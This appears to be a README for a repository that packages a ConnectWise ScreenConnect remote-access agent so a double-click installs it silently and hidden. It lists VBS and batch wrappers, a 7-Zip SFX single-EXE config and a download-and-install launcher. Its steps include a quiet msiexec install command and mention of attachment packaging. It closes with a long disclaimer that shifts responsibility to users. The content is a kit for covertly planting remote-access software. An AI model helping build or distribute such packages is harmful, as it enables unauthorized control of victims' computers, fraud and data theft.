Plain-English walkthrough for packaging a ConnectWise ScreenConnect / Control Access agent so a double-click installs it quietly in the background (MSI + hidden wrapper).
Author: iRichNode
Telegram: https://t.me/iRichNodes
| Path | Description |
|---|---|
| Screen_Connect_Agent_Silent_Install_Guide_by_iRichNode.pdf | Full step-by-step PDF guide |
| scripts/setup.vbs | Local silent double-click installer wrapper |
| scripts/download-and-install.vbs | Thin launcher that pulls MSI from your download link |
| scripts/install.bat | Batch quiet install helper |
| scripts/7zsfx-config.txt | 7-Zip SFX config for a single EXE drop |
- Log into your ScreenConnect / Control instance.
- Build a Windows Access agent MSI (not the interactive EXE).
- Save it as
agent.msinext toscripts/setup.vbs. - On a lab Windows box (admin), dry-run:
msiexec.exe /i agent.msi ALLUSERS=1 /qn /norestart /L*v "%TEMP%\sc-agent-install.log"- Confirm the ScreenConnect Client service is running and the host shows under Access.
- Double-click
setup.vbs, or wrapagent.msi+setup.vbswith IExpress / 7-Zip SFX into one EXE. - Optionally host the MSI and point
download-and-install.vbsat your URL.
Full detail, troubleshooting, attachment packaging notes, and cleanup steps are in the PDF.
This guide is for educational purposes only.
It is intended for learning and for people who are legally authorized to test systems they own or have written permission to assess (for example penetration testers under a signed rules of engagement).
iRichNode is not responsible for anyone who uses this material incorrectly, illegally, or outside proper authorization.
If you misuse this guide — including installing remote-access software on systems without permission, deploying agents for harassment, fraud, unauthorized access, or any other unlawful activity — you alone accept the full consequences. That can include civil liability, criminal prosecution, account bans, employer discipline, and any other penalties that apply where you live.
By downloading, copying, or running anything from this repository you confirm that:
- You will use it only for lawful, authorized, educational, or defensive-security training purposes.
- You understand that remote-access agent deployment on systems you do not own or control without permission is illegal.
- You will not hold iRichNode, related channels, or contributors liable for damages, losses, or legal outcomes from your use or misuse.
- Wrong use is solely your responsibility, and you will face the consequences of that misuse.
If you do not agree, do not use this repository.
Telegram: https://t.me/iRichNodes
No warranty of any kind. Provided as-is for education. You are responsible for complying with all applicable laws and vendor terms.